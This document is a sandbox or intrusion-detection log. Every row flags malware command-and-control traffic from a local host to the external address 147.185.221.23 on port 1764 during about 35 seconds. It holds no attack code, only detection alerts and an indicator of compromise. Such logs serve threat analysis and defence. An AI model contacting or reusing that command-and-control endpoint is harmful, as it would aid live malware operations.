                      2024-10-13T19:10:21.985119+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:22.094395+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:22.203753+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:22.313246+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:22.423146+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:22.534177+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:22.641319+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:22.750749+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:22.862206+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:22.969318+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:23.079072+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:23.188200+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:23.297392+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:23.412850+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:23.531938+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:23.641148+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:23.750876+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:23.865113+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:24.034558+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:24.142796+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:24.251143+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:24.360109+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:24.688174+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:24.797597+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:24.907070+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:25.016320+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:25.125843+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:25.235085+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:25.344688+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:25.453565+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:25.563222+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:25.672740+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:25.797299+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:25.907191+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:26.016148+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:26.386871+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:26.656496+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:26.774530+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:26.891179+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:27.001058+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:27.110190+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:27.225738+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:27.328633+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:27.441793+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:27.563602+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:27.672557+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:27.785245+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:27.893044+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:28.001761+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:28.112394+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:28.231497+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:28.344338+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:28.454492+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:28.567769+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:28.676054+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:28.782045+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:28.893427+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:29.008754+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:29.194886+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:30.257087+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:30.359948+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:30.469891+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:30.593763+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:30.703591+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:30.860163+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:30.987403+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:31.094276+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:31.251866+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:31.344278+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:31.453754+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:31.563001+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:31.672488+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:31.781906+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:31.891067+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:32.000546+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:32.148597+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:32.221476+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:32.328704+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:32.438081+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:32.547770+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:32.672464+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:32.804279+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:32.950881+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:33.063078+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:33.172267+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:33.557001+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:33.735678+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:33.844344+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:33.953755+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:34.070879+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:34.172310+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:34.297574+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:34.406743+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:34.516177+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:34.627227+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:34.745194+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:34.860016+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:34.970202+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:35.078796+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:35.187959+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:35.319678+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:35.437958+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:35.547473+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:35.656909+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:35.766133+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:35.895762+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:36.000667+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:36.109893+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:36.222217+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:36.342893+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:36.455920+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:36.579311+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:36.812917+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:36.814522+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:36.923428+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:37.031792+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:37.141115+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:37.250654+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:37.367628+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:37.485001+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:37.594352+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:37.714350+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:37.832050+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:37.938164+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:38.050712+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:38.157202+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:38.291012+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:38.406634+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:38.516430+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:38.626599+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:38.747269+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:38.866560+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:38.984777+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:39.096261+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:39.204463+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:39.314260+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:39.429368+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:39.547364+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:39.672949+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:39.813179+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:39.928482+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:40.047604+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:40.158321+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:40.297413+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:40.406814+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:40.516062+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:40.625603+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:40.745684+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:40.859773+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:40.969346+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:41.111048+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:41.250573+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:41.359748+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:41.494957+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:41.837602+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:41.980895+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:42.134508+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:42.250604+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:42.369942+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:42.491871+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:42.609775+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:42.739813+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:42.874248+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:42.984999+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:43.109877+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:43.220918+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:43.328652+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:43.438175+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:43.558839+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:43.672279+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:43.781912+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:43.938252+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:44.047606+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:44.156670+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:44.266365+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:44.375616+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:44.484849+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:44.603783+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:44.719550+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:44.845230+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:44.964746+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:45.086522+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:45.203830+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:45.313171+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:45.440514+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:45.563159+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:45.672346+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:45.799329+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:45.907029+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:46.028128+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:46.141170+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:46.250576+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:46.359872+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:46.469357+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:46.594377+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:46.727997+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:46.844282+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:46.956906+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:47.062991+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:47.172509+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:47.281647+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:47.391634+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:47.500451+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:47.610075+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:47.734692+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:47.844171+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:47.953515+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:48.072244+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:48.188604+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:48.375865+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:48.538935+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:48.802398+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:48.926299+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:49.094743+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:49.240105+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:49.313305+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:49.434543+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:49.773687+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:49.891085+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:50.000584+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:50.130808+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:50.250473+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:50.362934+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:50.469279+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:50.578771+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:50.692746+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:50.822813+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:50.942028+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:51.082286+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:51.263764+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:51.562931+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:51.730585+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:51.855271+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:51.971735+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:52.086662+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:52.231068+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:52.344086+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:52.478933+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:52.563077+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:52.672326+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:52.812505+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:52.922225+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:53.034245+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:53.140999+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:53.275167+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:53.359829+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:53.469282+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:53.602745+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:53.703659+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:54.875409+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:54.985394+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:55.094352+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:55.204990+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:55.313245+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:55.422868+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:55.531696+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:55.641061+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:55.735640+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:55.846934+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:55.975661+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:56.226836+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:56.530841+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:56.611817+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:56.703640+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:56.985081+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:57.078562+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:57.172865+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
